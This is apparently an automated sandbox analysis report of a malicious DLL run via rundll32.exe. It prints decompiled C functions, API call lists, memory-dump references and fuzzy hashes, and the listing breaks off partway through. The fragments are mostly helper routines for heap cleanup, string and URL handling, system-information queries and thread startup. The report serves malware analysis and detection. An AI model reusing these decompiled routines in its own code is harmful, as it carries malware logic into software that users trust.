                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                • Opcode ID: 8e9f174625544f7bb8e8ba6bef46b868f9e8e1ddb712c7f9d45d687d7cb3119f
                                                                                                                                                                                                                                • Instruction ID: 8071912a55905b5bc387dfc06f7af5a6a236b50c10b253028cf4af03d3e33d0d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9f174625544f7bb8e8ba6bef46b868f9e8e1ddb712c7f9d45d687d7cb3119f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CF090327011246ADF20EB669D4ADEF36ECDBD6714F000162F916D7010EE20DA8687F2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A91F47, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A91F47() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xa9d2a4; // 0x2e0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xa9d2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xa9d2a4; // 0x2e0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xa9d270; // 0x4be0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                                                                                                                                                0x00a91f47
                                                                                                                                                                                                                                0x00a91f4e
                                                                                                                                                                                                                                0x00a91f98
                                                                                                                                                                                                                                0x00a91f9a
                                                                                                                                                                                                                                0x00a91f9a
                                                                                                                                                                                                                                0x00a91f52
                                                                                                                                                                                                                                0x00a91f58
                                                                                                                                                                                                                                0x00a91f5d
                                                                                                                                                                                                                                0x00a91f61
                                                                                                                                                                                                                                0x00a91f67
                                                                                                                                                                                                                                0x00a91f6e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a91f70
                                                                                                                                                                                                                                0x00a91f75
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a91f75
                                                                                                                                                                                                                                0x00a91f77
                                                                                                                                                                                                                                0x00a91f7f
                                                                                                                                                                                                                                0x00a91f82
                                                                                                                                                                                                                                0x00a91f82
                                                                                                                                                                                                                                0x00a91f88
                                                                                                                                                                                                                                0x00a91f8f
                                                                                                                                                                                                                                0x00a91f92
                                                                                                                                                                                                                                0x00a91f92
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetEvent.KERNEL32(000002E0,00000001,00A959AE), ref: 00A91F52
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 00A91F61
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(000002E0), ref: 00A91F82
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32(04BE0000), ref: 00A91F92
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4109453060-0
                                                                                                                                                                                                                                • Opcode ID: 4004f8032087574e01c170c19ffc530a553b324a06675c982da5e7d264530c80
                                                                                                                                                                                                                                • Instruction ID: 00ea3a884fc8811bcc11453ad01545da72026ed2b018297a3b0e8780af243915
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4004f8032087574e01c170c19ffc530a553b324a06675c982da5e7d264530c80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF03071B01717DBDF20EBB99E49A5236ECAB15771B040216B819DB1D0DF20D8428660
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A614E3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A614E3(void* __ecx, WCHAR** _a4) {
				struct HINSTANCE__* _v8;
				long _v12;
				long _t10;
				long _t19;
				long _t20;
				WCHAR* _t23;

				_v8 =  *0xa641b0;
				_t19 = 0x104;
				_t23 = E00A62020(0x208);
				if(_t23 == 0) {
					L8:
					_t20 = 8;
					L9:
					return _t20;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
					_v12 = _t10;
					if(_t10 == 0 || _t19 != _t10) {
						break;
					}
					_t19 = _t19 + 0x104;
					E00A61F0A(_t23);
					_t23 = E00A62020(_t19 + _t19);
					if(_t23 != 0) {
						continue;
					}
					break;
				}
				_t20 = 0;
				if(_t23 == 0) {
					goto L8;
				}
				if(_v12 == 0) {
					_t20 = GetLastError();
					E00A61F0A(_t23);
				} else {
					 *_a4 = _t23;
				}
				goto L9;
			}









                                                                                                                                                                                                                                0x00a614f4
                                                                                                                                                                                                                                0x00a614f7
                                                                                                                                                                                                                                0x00a61501
                                                                                                                                                                                                                                0x00a61505
                                                                                                                                                                                                                                0x00a6155a
                                                                                                                                                                                                                                0x00a6155c
                                                                                                                                                                                                                                0x00a6155d
                                                                                                                                                                                                                                0x00a61562
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61507
                                                                                                                                                                                                                                0x00a61507
                                                                                                                                                                                                                                0x00a6150c
                                                                                                                                                                                                                                0x00a61512
                                                                                                                                                                                                                                0x00a61517
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a6151e
                                                                                                                                                                                                                                0x00a61524
                                                                                                                                                                                                                                0x00a61532
                                                                                                                                                                                                                                0x00a61536
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61536
                                                                                                                                                                                                                                0x00a61538
                                                                                                                                                                                                                                0x00a6153c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61541
                                                                                                                                                                                                                                0x00a61551
                                                                                                                                                                                                                                0x00a61553
                                                                                                                                                                                                                                0x00a61543
                                                                                                                                                                                                                                0x00a61546
                                                                                                                                                                                                                                0x00a61546
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A62020: HeapAlloc.KERNEL32(00000000,?,00A61593,00000030,747863F0,00000000), ref: 00A6202C
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,00A6160E,?), ref: 00A6150C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00A6160E,?), ref: 00A6154A
                                                                                                                                                                                                                                  • Part of subcall function 00A61F0A: HeapFree.KERNEL32(00000000,?,00A61558,00000000,?,?,?,00A6160E,?), ref: 00A61F16
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$AllocErrorFileFreeLastModuleName
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1691993961-1084903527
                                                                                                                                                                                                                                • Opcode ID: fb5d495fa9832f93ef14d83545dfc8c1d28c8e26bed0eab0e061dd187c0a8671
                                                                                                                                                                                                                                • Instruction ID: a88e01348374168d67a0d0b06c0278f651a34070aeadc4d60f7be9b2c0bf25dd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb5d495fa9832f93ef14d83545dfc8c1d28c8e26bed0eab0e061dd187c0a8671
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701D472A01612ABCB2197ADDC5499FFFB8AFD5751B190122FA03D7210EA70CD4187A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A91EBA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A91EBA(CHAR* _a4) {
				long _t9;
				CHAR* _t10;

				_t10 = 0;
				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
				if(_t9 != 0) {
					_t10 = E00A95157(_t9);
					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
						E00A953BB(_t10);
						_t10 = 0;
					}
				}
				return _t10;
			}





                                                                                                                                                                                                                                0x00a91ec3
                                                                                                                                                                                                                                0x00a91ecd
                                                                                                                                                                                                                                0x00a91ed1
                                                                                                                                                                                                                                0x00a91ed9
                                                                                                                                                                                                                                0x00a91edd
                                                                                                                                                                                                                                0x00a91eec
                                                                                                                                                                                                                                0x00a91ef1
                                                                                                                                                                                                                                0x00a91ef1
                                                                                                                                                                                                                                0x00a91edd
                                                                                                                                                                                                                                0x00a91ef8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A97528,73797325), ref: 00A91ECB
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A91EE5
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                                                                                                                                                • String ID: PGxt
                                                                                                                                                                                                                                • API String ID: 1564683301-789712160
                                                                                                                                                                                                                                • Opcode ID: 392f053e7cb5a530679552ac76c9348606d01bf0aab36dee81897be89004fe08
                                                                                                                                                                                                                                • Instruction ID: b089f4da71b689ac004efb904ff3fa2825ce3c827dca859aaab960479df4042c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 392f053e7cb5a530679552ac76c9348606d01bf0aab36dee81897be89004fe08
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9E04F32702933678A3367AA9C59DABDEDCEF92AF07050125BD08D3221DE10CC12C2E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A918B3, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                                			E00A918B3(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00A95157(_t2);
				if(_t34 != 0) {
					_t30 = E00A95157(_t28);
					if(_t30 == 0) {
						E00A953BB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00A9A962(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00A9A962(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                                                                                                                                                0x00a918b3
                                                                                                                                                                                                                                0x00a918bd
                                                                                                                                                                                                                                0x00a918bf
                                                                                                                                                                                                                                0x00a918c5
                                                                                                                                                                                                                                0x00a918c5
                                                                                                                                                                                                                                0x00a918ce
                                                                                                                                                                                                                                0x00a918d2
                                                                                                                                                                                                                                0x00a918de
                                                                                                                                                                                                                                0x00a918e2
                                                                                                                                                                                                                                0x00a91956
                                                                                                                                                                                                                                0x00a918e4
                                                                                                                                                                                                                                0x00a918e4
                                                                                                                                                                                                                                0x00a918e8
                                                                                                                                                                                                                                0x00a918ed
                                                                                                                                                                                                                                0x00a918f2
                                                                                                                                                                                                                                0x00a9190c
                                                                                                                                                                                                                                0x00a918fb
                                                                                                                                                                                                                                0x00a918fb
                                                                                                                                                                                                                                0x00a918ff
                                                                                                                                                                                                                                0x00a91902
                                                                                                                                                                                                                                0x00a91907
                                                                                                                                                                                                                                0x00a91907
                                                                                                                                                                                                                                0x00a91911
                                                                                                                                                                                                                                0x00a91939
                                                                                                                                                                                                                                0x00a9193f
                                                                                                                                                                                                                                0x00a91942
                                                                                                                                                                                                                                0x00a91913
                                                                                                                                                                                                                                0x00a91915
                                                                                                                                                                                                                                0x00a9191d
                                                                                                                                                                                                                                0x00a91928
                                                                                                                                                                                                                                0x00a9192d
                                                                                                                                                                                                                                0x00a9192d
                                                                                                                                                                                                                                0x00a91949
                                                                                                                                                                                                                                0x00a91950
                                                                                                                                                                                                                                0x00a91951
                                                                                                                                                                                                                                0x00a91951
                                                                                                                                                                                                                                0x00a918e2
                                                                                                                                                                                                                                0x00a91961

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00A92E4A,00000000,00000000,747C81D0,04FD9618,?,?,00A921A4,?,04FD9618), ref: 00A918BF
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                  • Part of subcall function 00A9A962: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00A918ED,00000000,00000001,00000001,?,?,00A92E4A,00000000,00000000,747C81D0,04FD9618), ref: 00A9A970
                                                                                                                                                                                                                                  • Part of subcall function 00A9A962: StrChrA.SHLWAPI(?,0000003F,?,?,00A92E4A,00000000,00000000,747C81D0,04FD9618,?,?,00A921A4,?,04FD9618,0000EA60,?), ref: 00A9A97A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00A92E4A,00000000,00000000,747C81D0,04FD9618,?,?,00A921A4), ref: 00A9191D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,747C81D0), ref: 00A9192D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00A91939
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3767559652-0
                                                                                                                                                                                                                                • Opcode ID: 38a6443754db47e33af073d21b7f465f6ace8716a64e8891a9dcb70ca6429773
                                                                                                                                                                                                                                • Instruction ID: 32077ec6fcb860874e158ebbe32b9e8c223c4faf6f5705d0abc36ffe60a879dc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38a6443754db47e33af073d21b7f465f6ace8716a64e8891a9dcb70ca6429773
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0621B476704256EBCF12AFB4CC65AAA7FF9AF06794F154055F9459F202DB30CA0187A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A91FCE, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A91FCE(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00A95157(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                                                                                                                                                0x00a91fe3
                                                                                                                                                                                                                                0x00a91fe7
                                                                                                                                                                                                                                0x00a91ff1
                                                                                                                                                                                                                                0x00a91ff6
                                                                                                                                                                                                                                0x00a91ffb
                                                                                                                                                                                                                                0x00a91ffd
                                                                                                                                                                                                                                0x00a92005
                                                                                                                                                                                                                                0x00a9200a
                                                                                                                                                                                                                                0x00a92018
                                                                                                                                                                                                                                0x00a9201d
                                                                                                                                                                                                                                0x00a92027

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,04FD9364,?,00A929B1,004F0053,04FD9364,?,?,?,?,?,?,00A9A080), ref: 00A91FDE
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00A929B1,?,00A929B1,004F0053,04FD9364,?,?,?,?,?,?,00A9A080), ref: 00A91FE5
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,00A929B1,004F0053,04FD9364,?,?,?,?,?,?,00A9A080), ref: 00A92005
                                                                                                                                                                                                                                • memcpy.NTDLL(747869A0,00A929B1,00000002,00000000,004F0053,747869A0,?,?,00A929B1,004F0053,04FD9364), ref: 00A92018
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2411391700-0
                                                                                                                                                                                                                                • Opcode ID: 80668520ab08165ef6d82e990beef7f0178f21b83514eea62849ede48f0b01ed
                                                                                                                                                                                                                                • Instruction ID: 32ad04e3164cd71d98b92af40da717cee9794559f2d9d6cd81e2bc1ea8a413cb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80668520ab08165ef6d82e990beef7f0178f21b83514eea62849ede48f0b01ed
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26F03C36A00119FB8F11EBA8CC45CCE7BACEF483547114062B90497201E631EA118BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A92629, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(04FD9B98,00000000,00000000,770CC740,00A9A73F,00000000), ref: 00A92639
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A92641
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,04FD9B98), ref: 00A92655
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A92660
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 74227042-0
                                                                                                                                                                                                                                • Opcode ID: 7faa85ddaae26dadc48082a162203bcafc036f1b11563b6bad2d7ce763805ca5
                                                                                                                                                                                                                                • Instruction ID: ff01f1fd25442f498a9a3422ada397461a7e013e160de4c43ab6abc5b9431f32
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7faa85ddaae26dadc48082a162203bcafc036f1b11563b6bad2d7ce763805ca5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53E01277B01A21A7CB11EBE4AC48C5BBBADEF896617040417F600D7111CB2599128BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Analysis Process: rundll32.exe PID: 7052 Parent PID: 6980 rundll32.exeCOMMON

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 02B8156C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120sleepnativesynchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E02B8156C(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E02B81D65();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E02B82020(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E02B81F0A(_t57);
						}
					} while (_v8 != 0);
					_t27 = E02B817CE(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E02B81000(E02B81064,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E02B814E3(_t53,  &_a4) != 0) {
					 *0x2b841b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t60 =  *_t68(_t52, 0, 0);
				if(_t60 == 0) {
					L16:
					 *0x2b841b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E02B82020(_t60 + _t19);
				 *0x2b841b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60);
				E02B81F0A(_t52);
				goto L18;
			}























                                                                                                                                                                                                                                0x02b81572
                                                                                                                                                                                                                                0x02b81577
                                                                                                                                                                                                                                0x02b8157c
                                                                                                                                                                                                                                0x02b816a7
                                                                                                                                                                                                                                0x02b816a7
                                                                                                                                                                                                                                0x02b81585
                                                                                                                                                                                                                                0x02b81585
                                                                                                                                                                                                                                0x02b81589
                                                                                                                                                                                                                                0x02b8158c
                                                                                                                                                                                                                                0x02b8158d
                                                                                                                                                                                                                                0x02b81593
                                                                                                                                                                                                                                0x02b81597
                                                                                                                                                                                                                                0x02b815ce
                                                                                                                                                                                                                                0x02b81599
                                                                                                                                                                                                                                0x02b815a1
                                                                                                                                                                                                                                0x02b815a7
                                                                                                                                                                                                                                0x02b815a9
                                                                                                                                                                                                                                0x02b815ae
                                                                                                                                                                                                                                0x02b815b4
                                                                                                                                                                                                                                0x02b815b6
                                                                                                                                                                                                                                0x02b815b6
                                                                                                                                                                                                                                0x02b815bd
                                                                                                                                                                                                                                0x02b815c3
                                                                                                                                                                                                                                0x02b815c3
                                                                                                                                                                                                                                0x02b815c7
                                                                                                                                                                                                                                0x02b815c7
                                                                                                                                                                                                                                0x02b815d5
                                                                                                                                                                                                                                0x02b815dc
                                                                                                                                                                                                                                0x02b815e5
                                                                                                                                                                                                                                0x02b815e8
                                                                                                                                                                                                                                0x02b815ee
                                                                                                                                                                                                                                0x02b815f1
                                                                                                                                                                                                                                0x02b815fa
                                                                                                                                                                                                                                0x02b816a3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b816a5
                                                                                                                                                                                                                                0x02b81603
                                                                                                                                                                                                                                0x02b81654
                                                                                                                                                                                                                                0x02b81654
                                                                                                                                                                                                                                0x02b8166a
                                                                                                                                                                                                                                0x02b8166e
                                                                                                                                                                                                                                0x02b81696
                                                                                                                                                                                                                                0x02b81670
                                                                                                                                                                                                                                0x02b81673
                                                                                                                                                                                                                                0x02b81679
                                                                                                                                                                                                                                0x02b8167e
                                                                                                                                                                                                                                0x02b81685
                                                                                                                                                                                                                                0x02b81685
                                                                                                                                                                                                                                0x02b8168c
                                                                                                                                                                                                                                0x02b8168c
                                                                                                                                                                                                                                0x02b81699
                                                                                                                                                                                                                                0x02b8169f
                                                                                                                                                                                                                                0x02b816a1
                                                                                                                                                                                                                                0x02b816a1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b8169f
                                                                                                                                                                                                                                0x02b81610
